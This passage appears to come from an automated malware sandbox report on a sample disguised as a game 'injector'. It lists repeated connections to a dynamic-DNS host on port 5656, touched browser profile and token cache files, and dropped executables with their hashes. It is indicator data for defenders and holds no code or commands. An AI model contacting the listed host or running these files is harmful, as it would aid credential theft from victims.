| US | 8.8.8.8:53 | 67.112.168.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | kackrock.ddns.net | udp |
| DK | 62.199.104.190:5656 | kackrock.ddns.net | tcp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | 233.130.159.162.in-addr.arpa | udp |
| DK | 62.199.104.190:5656 | kackrock.ddns.net | tcp |
| DK | 62.199.104.190:5656 | kackrock.ddns.net | tcp |
| DE | 142.250.186.99:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.135.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 232.135.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | kackrock.ddns.net | udp |
| DK | 62.199.104.190:5656 | kackrock.ddns.net | tcp |
| US | 8.8.8.8:53 | 84.242.123.52.in-addr.arpa | udp |
| NL | 23.62.61.155:443 | www.bing.com | udp |
| US | 8.8.8.8:53 | 155.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | r.bing.com | udp |
| US | 8.8.8.8:53 | th.bing.com | udp |
| NL | 23.62.61.97:443 | th.bing.com | udp |
| NL | 23.62.61.194:443 | th.bing.com | udp |
| US | 8.8.8.8:53 | aefd.nelreports.net | udp |
| US | 2.17.251.10:443 | aefd.nelreports.net | udp |
| US | 2.17.251.10:443 | aefd.nelreports.net | tcp |
| US | 104.18.33.89:443 | www2.bing.com | udp |
| US | 8.8.8.8:53 | 89.33.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.114.53.23.in-addr.arpa | udp |
| DK | 62.199.104.190:5656 | kackrock.ddns.net | tcp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 119.110.54.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.173.246.72.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cracked.io | udp |
| US | 104.18.1.137:443 | cracked.io | tcp |
| US | 104.18.1.137:443 | cracked.io | tcp |
| US | 8.8.8.8:53 | static.cracked.io | udp |
| US | 104.18.1.137:443 | static.cracked.io | udp |
| US | 8.8.8.8:53 | cdnjs.cloudflare.com | udp |
| US | 8.8.8.8:53 | external-content.duckduckgo.com | udp |
| IE | 52.142.125.222:443 | external-content.duckduckgo.com | tcp |
| IE | 52.142.125.222:443 | external-content.duckduckgo.com | tcp |
| US | 104.17.25.14:443 | cdnjs.cloudflare.com | tcp |
| US | 8.8.8.8:53 | 137.1.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 202.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.25.17.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.185.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 222.125.142.52.in-addr.arpa | udp |
| US | 104.17.25.14:443 | cdnjs.cloudflare.com | udp |
| US | 8.8.8.8:53 | static.cracked.to | udp |
| US | 172.67.73.245:443 | static.cracked.to | tcp |
| US | 172.67.73.245:443 | static.cracked.to | tcp |
| US | 172.67.73.245:443 | static.cracked.to | tcp |
| US | 172.67.73.245:443 | static.cracked.to | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| NL | 23.63.101.170:80 | apps.identrust.com | tcp |
| US | 8.8.8.8:53 | 245.73.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 170.101.63.23.in-addr.arpa | udp |
| DK | 62.199.104.190:5656 | kackrock.ddns.net | tcp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| NL | 23.62.61.97:443 | th.bing.com | udp |
| US | 104.17.25.14:443 | cdnjs.cloudflare.com | udp |
| US | 8.8.8.8:53 | kackrock.ddns.net | udp |
| DK | 62.199.104.190:5656 | kackrock.ddns.net | tcp |
| DK | 62.199.104.190:5656 | kackrock.ddns.net | tcp |
| DK | 62.199.104.190:5656 | kackrock.ddns.net | tcp |
| US | 8.8.8.8:53 | kackrock.ddns.net | udp |
| DK | 62.199.104.190:5656 | kackrock.ddns.net | tcp |
| DK | 62.199.104.190:5656 | kackrock.ddns.net | tcp |
| DK | 62.199.104.190:5656 | kackrock.ddns.net | tcp |
| US | 8.8.8.8:53 | kackrock.ddns.net | udp |
| DK | 62.199.104.190:5656 | kackrock.ddns.net | tcp |
| DK | 62.199.104.190:5656 | kackrock.ddns.net | tcp |
| DK | 62.199.104.190:5656 | kackrock.ddns.net | tcp |
| US | 8.8.8.8:53 | kackrock.ddns.net | udp |
| DK | 62.199.104.190:5656 | kackrock.ddns.net | tcp |
| DK | 62.199.104.190:5656 | kackrock.ddns.net | tcp |
| DK | 62.199.104.190:5656 | kackrock.ddns.net | tcp |
| US | 8.8.8.8:53 | kackrock.ddns.net | udp |
| DK | 62.199.104.190:5656 | kackrock.ddns.net | tcp |
| DK | 62.199.104.190:5656 | kackrock.ddns.net | tcp |
| DK | 62.199.104.190:5656 | kackrock.ddns.net | tcp |
| US | 8.8.8.8:53 | kackrock.ddns.net | udp |
| DK | 62.199.104.190:5656 | kackrock.ddns.net | tcp |
| DK | 62.199.104.190:5656 | kackrock.ddns.net | tcp |
| DK | 62.199.104.190:5656 | kackrock.ddns.net | tcp |
| US | 8.8.8.8:53 | kackrock.ddns.net | udp |
| DK | 62.199.104.190:5656 | kackrock.ddns.net | tcp |
| DK | 62.199.104.190:5656 | kackrock.ddns.net | tcp |
| DK | 62.199.104.190:5656 | kackrock.ddns.net | tcp |
| US | 8.8.8.8:53 | kackrock.ddns.net | udp |
| DK | 62.199.104.190:5656 | kackrock.ddns.net | tcp |
| DK | 62.199.104.190:5656 | kackrock.ddns.net | tcp |
| DK | 62.199.104.190:5656 | kackrock.ddns.net | tcp |
| US | 8.8.8.8:53 | kackrock.ddns.net | udp |
| DK | 62.199.104.190:5656 | kackrock.ddns.net | tcp |
| DK | 62.199.104.190:5656 | kackrock.ddns.net | tcp |
| DK | 62.199.104.190:5656 | kackrock.ddns.net | tcp |
| US | 8.8.8.8:53 | kackrock.ddns.net | udp |
| DK | 62.199.104.190:5656 | kackrock.ddns.net | tcp |
| DK | 62.199.104.190:5656 | kackrock.ddns.net | tcp |
| US | 8.8.8.8:53 | kackrock.ddns.net | udp |
| DK | 62.199.104.190:5656 | kackrock.ddns.net | tcp |
| DK | 62.199.104.190:5656 | kackrock.ddns.net | tcp |
| DK | 62.199.104.190:5656 | kackrock.ddns.net | tcp |
| US | 8.8.8.8:53 | kackrock.ddns.net | udp |
| DK | 62.199.104.190:5656 | kackrock.ddns.net | tcp |
| DK | 62.199.104.190:5656 | kackrock.ddns.net | tcp |
| DK | 62.199.104.190:5656 | kackrock.ddns.net | tcp |
| US | 8.8.8.8:53 | kackrock.ddns.net | udp |
| DK | 62.199.104.190:5656 | kackrock.ddns.net | tcp |
| DK | 62.199.104.190:5656 | kackrock.ddns.net | tcp |
| DK | 62.199.104.190:5656 | kackrock.ddns.net | tcp |
| US | 8.8.8.8:53 | kackrock.ddns.net | udp |
| DK | 62.199.104.190:5656 | kackrock.ddns.net | tcp |
| DK | 62.199.104.190:5656 | kackrock.ddns.net | tcp |
| DK | 62.199.104.190:5656 | kackrock.ddns.net | tcp |
| US | 8.8.8.8:53 | kackrock.ddns.net | udp |
| DK | 62.199.104.190:5656 | kackrock.ddns.net | tcp |
| DK | 62.199.104.190:5656 | kackrock.ddns.net | tcp |
| DK | 62.199.104.190:5656 | kackrock.ddns.net | tcp |
| US | 8.8.8.8:53 | kackrock.ddns.net | udp |
| DK | 62.199.104.190:5656 | kackrock.ddns.net | tcp |
| DK | 62.199.104.190:5656 | kackrock.ddns.net | tcp |
| DK | 62.199.104.190:5656 | kackrock.ddns.net | tcp |
| US | 8.8.8.8:53 | kackrock.ddns.net | udp |
| DK | 62.199.104.190:5656 | kackrock.ddns.net | tcp |
Files
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 4d6e17218d9a99976d1a14c6f6944c96 |
| SHA1 | 9e54a19d6c61d99ac8759c5f07b2f0d5faab447f |
| SHA256 | 32e343d2794af8bc6f2f7c905b5df11d53db4ad8922b92ad5e7cc9c856509d93 |
| SHA512 | 3fa166b3e2d1236298d8dda7071a6fcf2bde283f181b8b0a07c0bb8ba756d6f55fa8a847ca5286d4dbabc6dace67e842a118866320ac01bd5f93cccd3a032e47 |
\??\pipe\LOCAL\crashpad_3388_TPEOWHQNVAVQUQGG
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 48538527c85e50f6c28716c799a21a6b |
| SHA1 | b96fa85695e209ff5c9f2886895f976c5c713e8a |
| SHA256 | fe7a8f294861af20aa58f7b2a99fb940ce8902593b7807c9333e170a250495fa |
| SHA512 | ece85c15fb156b64a8ddafeb0f84d41c53f14464ac3050b2f8a88f42315fb2d5f5284608348e8c4d080f0952c4ad50924298ad14e6f8d54d55dead6212c7f63b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 1d5a706389d8b79b892a6d61ea71cbb2 |
| SHA1 | 8da031fbacbe7bb590d64d502256dc4fc1243f65 |
| SHA256 | d14efc85cf884154cf5784e8cc731d6d9dbe62f6b0ce3396fe0ec6a9b221e486 |
| SHA512 | a07c3fb36ae3031316177b265184649182ea4dd81f0b04c0d6fa2cc9c910a4d9550da9725d857f46713875cd6ba76ef6da9cfde716f8fb22d75bf848fc9c7425 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences
| MD5 | 1c7ec27d94da04714401b9adf0b17756 |
| SHA1 | 3e18d51664cd7c8036552c1557391ae0e7d3363d |
| SHA256 | 57be391e5772faf9845cc18c3b6c5e428c1181feaa56c5dd4c4d16472c9ebb52 |
| SHA512 | 067ce3414a4fdadf8b1fbc79cd0abfdbde43e60b848d9f06e1310f3c1192ab2135347d570baa9c1eee1da941f70e66a85ff4a82fcd6286268c542c97a5f2ba24 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | b4779af6108a1986cb05f9c1bad4dff8 |
| SHA1 | 802569ffcb98c3f1451b10afdb5dc0eda7ca4876 |
| SHA256 | a65e6a17d98579bb45f679753970fdc68bf2ffab4790ab3846638b45be24c1b9 |
| SHA512 | 45fa024f5f552e19b5b6343b3598017e685713796de18ad0d9b425754ea7ef0931d172bac8190c79f0b9d3e7db8dd9f4becd8276947f63e50f1ae6a91bf1827e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 285252a2f6327d41eab203dc2f402c67 |
| SHA1 | acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6 |
| SHA256 | 5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026 |
| SHA512 | 11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\data_1
| MD5 | f50f89a0a91564d0b8a211f8921aa7de |
| SHA1 | 112403a17dd69d5b9018b8cede023cb3b54eab7d |
| SHA256 | b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec |
| SHA512 | bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | f85b3b4fec7770d9f4d18af36fc21b55 |
| SHA1 | ca964fc1e0273a6b6f6fc07593be767ab3756c3c |
| SHA256 | 89f8748bd1e6a2eb5e95d41795bf5ccb6af8274dade8d40641a7e7b1640d9809 |
| SHA512 | f2a31149244e3900c290abab830631b75bf4ea0b6ee4374e938a2140c7507345031062d154e6a6a008d0046830f8ce692c2293e87ec1dfc9bfdb2435d2a03fc6 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG
| MD5 | 13c486874e12c1813416cf2084f9bd3d |
| SHA1 | 4ff0a07f889e5f06ffb31c6881126a4631b7ab2e |
| SHA256 | f60e63a448f3cc182588d6282469fd977d0565aac97f7f81d219cd32b2d840ad |
| SHA512 | 2aaceea8ea19ca5ba959de18f9e91e6a557f31c4a4185518c6f7bedd6807bf2b2275c79d7340216f61bf839fe04c4844d153cd732f563fa0c2a0598b8c6d4c01 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG
| MD5 | 2e7b1044974319155f7772a9d2b0510e |
| SHA1 | f603cd4fee3bf8d8279fd3406f57689f22c94e7c |
| SHA256 | 2a292da5c673d293f33827224bc50a504d1bcdf28d8a981c818c9ac7bdbb86ab |
| SHA512 | 58202bdd00f34a98f334dc7d928dcf44ae78b8aaf5a034f2812fd70965d3124c7ce7ea83df5ce717ec0313dccf780497ead67825afd2285bf00757e03c155ab9 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db
| MD5 | ee275ec30ba97dc8fcb7641a37b72329 |
| SHA1 | a8d20b8d545040fe149c2730578582d1287d7b55 |
| SHA256 | feba7a03b4abce4a78910290c26bcc824d9b4df8dbb7e47a4350f4462347f7ee |
| SHA512 | 0f835d59918e69aec8a46c22f37a16222d8ffd5ee126cc3aa9b0b69dbc435741f210fb9f5f0ac12bec0a821cc5adbed1d51810c34b247e8779830e8b9822c673 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 6f379c41d7d0ac5ea5f113a62fee4a42 |
| SHA1 | 4aa008447f3cf0f3fda55cbb64a579761413a3e9 |
| SHA256 | f25f6edb13388e793f0d9cd377a86462072125e77569216bcb2d40dc7f4cc2d7 |
| SHA512 | 08b6b62d24999c7f0aa01e90e7b87a747044df089995a0bd6366d5874b2e4b8687e9c7ec893d45257a7a3b5848413682ce2cc1bdae93e69c1f61a313d5a454f8 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History Provider Cache
| MD5 | a9851aa4c3c8af2d1bd8834201b2ba51 |
| SHA1 | fa95986f7ebfac4aab3b261d3ed0a21b142e91fc |
| SHA256 | e708be5e34097c8b4b6ecb50ead7705843d0dc4b0779b95ef57073d80f36c191 |
| SHA512 | 41a1b4d650ff55b164f3db02c8440f044c4ec31d8ddbbbf56195d4e27473c6b1379dfad3581e16429650e2364791f5c19aae723efc11986bb986ef262538b818 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Tabs_13357011505904057
| MD5 | 9a1cc409b6ef8c15f78caa8fb564742d |
| SHA1 | f006f75b14da84382e250584f036d6b7b0d4d766 |
| SHA256 | 5cbe754e2209aeac04a77e367981e547cfc32e49428b2b588499d2449d0877ed |
| SHA512 | ed65fe1900d9107490019b947d32bbfd187da3576e66822c5f71362eba7ea6d2f4ad0098ed8631ee245b2736183e5f92f2fea456bd1977389d743bfd13a4c473 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Last Version
| MD5 | 838a7b32aefb618130392bc7d006aa2e |
| SHA1 | 5159e0f18c9e68f0e75e2239875aa994847b8290 |
| SHA256 | ac3dd2221d90b09b795f1f72e72e4860342a4508fe336c4b822476eb25a55eaa |
| SHA512 | 9e350f0565cc726f66146838f9cebaaa38dd01892ffab9a45fe4f72e5be5459c0442e99107293a7c6f2412c71f668242c5e5a502124bc57cbf3b6ad8940cb3e9 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG
| MD5 | 9927fa5ce3f0517f5bdec824130a434a |
| SHA1 | 2d42d0aa78f433b6b3c1134e4781925a65175498 |
| SHA256 | d309ccd2ff7883ec6c7873947dfd9ed900ddf8b4cbd78b5328a7ed81aee44ffa |
| SHA512 | aa1d7da57eca64a482533529b12bd9d901eb0447dd5d22450612d822e3d703481e1629fe30f67ba324056b5dba2f2da26577c8538b719a934ba65eeb9c7fd80a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\000003.log
| MD5 | ba92e5bbca79ea378c3376187ae43eae |
| SHA1 | f0947098577f6d0fe07422acbe3d71510289e2fc |
| SHA256 | ccf4c13cd2433fe8a7add616c7d8e6b384cf441e4d948de5c6fc73e9315c619f |
| SHA512 | aa1d8b7eb9add6c5ed5635295f501f950914affc3fa9aa1ee58167ed110f99a1760b05e4efb779df8e432eab1b2a0fc9cf9d67a05b2d5432ff8f82c620a38a62 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG
| MD5 | be1eb628acf34e97f4533dad64ffa2fb |
| SHA1 | 39f9135d32b1533e566e3713d5988e4a8d318ebb |
| SHA256 | b9cb7b4e8b60ef2d17d405d4c28eae116491c54a300c7c2eff41ee951f9ad496 |
| SHA512 | 33ede826d333ce01cac7a87c177ea4752bd5ec9f2826fe27b380383781fdfc52fe1bff7ae5cf7741500114338d0623326173b94b9bc7f2a83aed0ea093b75c7d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG
| MD5 | cf934811d13766a9223b08f43e045782 |
| SHA1 | 710ae48150efb574d0614abf54e1d06acda5d81b |
| SHA256 | d0b23ecf4378d3594d1e2d9261d42a9deccd79779dcede3d58e5d014715023c8 |
| SHA512 | 41a3b1a71e7b2ff35e0ca663db1279edf0f56b215d5d8e8b320539b8c9b9b53e06981741b662857172db619801cb81ee516335a44897abf4a4df6a9efc7bc0ec |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000003.log
| MD5 | e2d22a1eb3920b6e344aa0d3542d9905 |
| SHA1 | 520f99fc83cdc576330ac8c4cf711af9e228276b |
| SHA256 | f2c18da53cc6fc8fcb3100135184d2a702a7b009cc6decda8d3de41f68a8c3e7 |
| SHA512 | c749f476664662e6ba41d00a125b93e8cf755c920fb2ce28d22d01beca24d3c1678d1bd42a958206784ad13c13a41e97527dfc0d53fbf54f0b1dd7130dbb4eed |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG
| MD5 | 8ffcc8e60ffbb1e3c0338918820402e4 |
| SHA1 | 1c9f545e1174ec107ef10731bc3db90ca76e61dd |
| SHA256 | c70e48916720e103ccca4e8f532ffec38c2b860ab47be4f272aa0378da09c8f7 |
| SHA512 | 8885152591ce3d0f54acad8600e199dda56da72e9a8b46d3302d3889fe6889ccfc4ff0f4bb2c4769857e3d09c3c485e3227ace8aa2d1b394ee291cfed5f6861a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 43076cf1e2e34e9d6efc2b176831a2a9 |
| SHA1 | fdf0f8e37c4e5ba28fd55e5caf94412d4c289b22 |
| SHA256 | e25148ab882675222ee2fc74163b611c5ec112e7f538c9c002bf8af1a76adcaf |
| SHA512 | ec322fe93277aeeeff5a4801a0321e80f00e996e90357903d647ea26d72721fd2c17075f4caa78767a2f4770689a6774b3da2fcf7a620ac2cc25b2e1a6ba8417 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG
| MD5 | bb45a89131c05d7f9303c6da5796d3ba |
| SHA1 | 581963e46b0629665bfbeb082878f89775a9194d |
| SHA256 | 562a23468ebbbb83c7af740257ce43819248593a4d34b5ad60938b91043bcbd5 |
| SHA512 | 61e51b3c3178d061ff6825d57b9421cdfcc62c6b2b74f42d499dcb1122ab6a9ae6aa296a69906cd999ce4e65832fe0ca4cd4756b41996d7de38b60022ced4c5b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_0
| MD5 | 6a358000e540484505ef1be10de0614d |
| SHA1 | e2428435ae397ab9334ece4fcc9efc73f694f55a |
| SHA256 | 318ac07b9305c2092d2b825a748b810f327267c12b3b7c739796201651f070f1 |
| SHA512 | 344e322a3ab28374794f13883fbcb593321e4c087f495d9e1e51344b18eb97f1885414461129d3e45618e4db26b54b90b8ad1a051dfe562158cf463363cb3889 |
C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\9cd93bc6dcf544bae69531052e64647ec02f2bb4.tbres
| MD5 | c04bcb82a84e38916665757851fc49cc |
| SHA1 | 196ff9cb450ec193e3be364fe44d7149205f0b93 |
| SHA256 | 11eec99a6ac4fd78417bd804e81a629a55929ea4c45a2947c8234d1df8158579 |
| SHA512 | 001f7353e33b02a59e5320a0a288e8ec632eb7b9de8290c19e82c3c9dee313c03474b4dfa70f3ec0f11cf28fa143e32877f72159fe5a7701e3aa01a3ef4c2e1e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_3
| MD5 | 26d663b1b0d0e22ed9eac024323c5aec |
| SHA1 | 32f1ba6aabd90be6ad89ee7d9ae029742569ccb8 |
| SHA256 | c1f49c4ee65365d6e8c20c7243fec520081334d7eb5ebfaf0736bb1b333e08c2 |
| SHA512 | 08d2a9d271c14456c7fe8fa0b8d14b93faffc92f8d348dbe13edbfcaa0becaf5035aa58b583daaa23ef29a931ac6dd0a821f0010850fd9b747c3bdcc6436acc5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_1
| MD5 | b54e6a8428f252fee8815d9d8e991a92 |
| SHA1 | 798938bf88f5e4f5d3eecdc2cf49487b5efb8f17 |
| SHA256 | f746e647518bbdc085e252d91f5da35d73d560259cf23867df4172c6c49147f9 |
| SHA512 | 9ec47eb25a144d89c6cb6523008932e4e051a60b93a48279b7a6515015b600610c184d8443910d6ab7b98440c2cbdfa4fc0e737a84acbb77ce36fad0ab630b09 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_0
| MD5 | 8af64a090194ed847c44dc10367e4b8e |
| SHA1 | ec36047ff549a66218a18ce68044defd245c1b01 |
| SHA256 | 97df3d7079dc4312f4284ed9903ac1eff372956e2fb4aa0a284ac3de3120878c |
| SHA512 | c5ab60c4b09cb3f894b93c00269747e45c1a67b0c8dcc859e1bcfe67f31a54ba062cddc0bc18c882761cce9a3ea795ba2c68aaa827ddb5938280f4498d33037c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_1
| MD5 | 7bcc499ce01bf0bbc40d2b953c58516e |
| SHA1 | 9a01c3fcf973069f988f6fd5e3e6d8cceeecaa10 |
| SHA256 | 0549365a43492f7128b7b61792866e16c73db40c440505dfd12c80964d78b09c |
| SHA512 | 0df5dd63d5eda8bea05bc593cfe1e4b391b2a26f8ca7b903df31f6bcb093f1059f7cc9850424c7c3d84134a56861b05a967f1638f766f79b29b233ed8e68a258 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Session_13357011505528057
| MD5 | 8606d733bb6862237e5a76bc267f940e |
| SHA1 | f4ca76a96390593e8dcc66c8d41fe51d4cc86416 |
| SHA256 | 82b2e4296a139986d6ea36905e0fd530aec41d2a234ef6ca25f8ff1b507ad7e1 |
| SHA512 | 04dd34dbed845cae57319f9883aa5f490d98855e830573fc333cbdae70bea58f99d93ac9dee7218002c9a1392721cdd1ab0b7f3ca21d137974f812b8a561ec0a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 87beb8369e3b2688e87453e6a2e9a56b |
| SHA1 | 285daf7e6cbe3617e65e2244f8a5880151f09dc1 |
| SHA256 | b6e092635b42c08b4174115b288fb0294ad8b4d74a402a337bda341114f8aa4b |
| SHA512 | a9eda1a89b1d57b0c1eaca8380abfa0b89f0e31829d979d7309f0257e3185fa82a4145258ec23de0f757457d6cdc3fefb5df100f7ceffecfa72d3a846d56d856 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | db243a72b2e246857b9f68d2d752f9f1 |
| SHA1 | b24676fbb26672f15934be116b69a8c53922c107 |
| SHA256 | 34c0483e5e80f24f7074880b970354bf2139d934311f0e8e0291615dbb0cfce2 |
| SHA512 | 72f42bd9e1fd902cc4ee9783adcdee062b97276b779c91269bc60f7dd0bbf911a588de5f33c1ad5f17e59b7f97e2f04bed7a85f3d554bb574e176307adaa5068 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\edge_shutdown_ms.txt
| MD5 | c0af0b03765b4a03458743d620c8491b |
| SHA1 | cc1e9b5cf85d1dbe9449740a3418f2ce05c8728d |
| SHA256 | 3bc292a46146d43be789e78b8db6ba816b41dd3c784a737cd98cc2b3dfcf2234 |
| SHA512 | 443ee527d2572e39aff0382026f4b638fdd4635d4e28531d84efa552d034434b5be5c5ce9528240087d5403649d5a883fa6d577b53b66c0f6c2b180385b1573d |
C:\Users\Admin\Desktop\rage free\Injector.exe
| MD5 | af1600933561571a811579e73ef2a78f |
| SHA1 | 89dbc08104c92fa2d296d2dcdd0cb2152c5ebf4a |
| SHA256 | 7ffea64e10fe0b27f31a2e97e3ec8eaf88a3468d282a53ab1d46ee0f868a9709 |
| SHA512 | 1160ec22d94171837c25ce1f00f6c31cca3725c3a8564cab5278d28f184b7872226a6abb1c24e28ddec0345a79efdef8a4fcfa28d7f7db2cca1d6234bb8927d7 |
memory/836-239-0x00007FF9735A0000-0x00007FF974061000-memory.dmp
memory/836-240-0x0000000000800000-0x00000000018A8000-memory.dmp
C:\Users\Admin\AppData\Roaming\injector.exe
| MD5 | 15fa4864c56c1bc724f1098aba8f08fb |
| SHA1 | faad863bfde036ac3ea9c65090fcdf8716d8147c |
| SHA256 | 3de2e86dde2444292306215c1082423e8ce8f99f5bf6e036dfb07ac32570c993 |
| SHA512 | 75b5bd9273078823218cd061cd62d7cf8a8dd98d9e656007998dec0703169d738c760bc17ee51d5c89065c0b43d41e67e53cda3075d228e26d440d099b7e8465 |
C:\Users\Admin\AppData\Roaming\creal.exe
| MD5 | 43a1e4b885c35fa760c6669c670165b2 |
| SHA1 | 1deea5bd35d69d98c5ff7ac2424004d2ae0e080b |
| SHA256 | 951600adde3d082e2fd9d832d1861c752ad7b3735ecbff956f7029f019572dba |
| SHA512 | 5b4b8066e1380c02a92ec5cc7387af6cd6ea169deae6462ed649113daf633c33aded3bb2b41999eeeacd5a6b820c1000065406736b4b6610275517fe0835d201 |
C:\Users\Admin\AppData\Roaming\Nothere.exe
| MD5 | 20e7e9c5171c2990ffeed3ae319d1d9b |
| SHA1 | efb8fc011d96166707442eadc9b757dad780d33c |
| SHA256 | 3385b4692ff4096c8b13c72105819f29f6f6664b3437614995339da93da317ba |
| SHA512 | 2f1a206de64d52faab38ea678ddbf2c3a9e3c04f24c974e30b44a693d780184606461ddc4a9ee998c4d41582f7c5202151d872c520c32bc1496e8b8c05c22481 |
memory/60-332-0x0000000000F80000-0x0000000000F9C000-memory.dmp
memory/60-330-0x00007FF9735A0000-0x00007FF974061000-memory.dmp
memory/836-329-0x00007FF9735A0000-0x00007FF974061000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI28962\python312.dll
| MD5 | 5c5602cda7ab8418420f223366fff5db |
| SHA1 | 52f81ee0aef9b6906f7751fd2bbd4953e3f3b798 |
| SHA256 | e7890e38256f04ee0b55ac5276bbf3ac61392c3a3ce150bb5497b709803e17ce |
| SHA512 | 51c3b4f29781bb52c137ddb356e1bc5a37f3a25f0ed7d89416b14ed994121f884cb3e40ccdbb211a8989e3bd137b8df8b28e232f98de8f35b03965cfce4b424f |
C:\Users\Admin\AppData\Local\Temp\_MEI28962\VCRUNTIME140.dll
| MD5 | 4585a96cc4eef6aafd5e27ea09147dc6 |
| SHA1 | 489cfff1b19abbec98fda26ac8958005e88dd0cb |
| SHA256 | a8f950b4357ec12cfccddc9094cca56a3d5244b95e09ea6e9a746489f2d58736 |
| SHA512 | d78260c66331fe3029d2cc1b41a5d002ec651f2e3bbf55076d65839b5e3c6297955afd4d9ab8951fbdc9f929dbc65eb18b14b59bce1f2994318564eb4920f286 |
C:\Users\Admin\AppData\Local\Temp\_MEI28962\base_library.zip
| MD5 | 3909f1a45b16c6c6ef797032de7e3b61 |
| SHA1 | 5a243f6c8db11bf401aeac69f4c2a0c6cd63b3a8 |
| SHA256 | 56cce68da6a7ebd11aab4b4a4e6a164647b42b29ae57656532c530d1e22e5b44 |
| SHA512 | 647e343eb9732150c0fd12c7142a960ede969b41d5a567940e89636f021f0c0b3249b6cfc99c732190085bcae7aa077f8ac52c8e7fe7817d48a34489f0cd5148 |
C:\Users\Admin\AppData\Local\Temp\_MEI28962\_ctypes.pyd
| MD5 | 10fdcf63d1c3c3b7e5861fbb04d64557 |
| SHA1 | 1aa153efec4f583643046618b60e495b6e03b3d7 |
| SHA256 | bc3b83d2dc9e2f0e6386ed952384c6cf48f6eed51129a50dfd5ef6cbbc0a8fb3 |
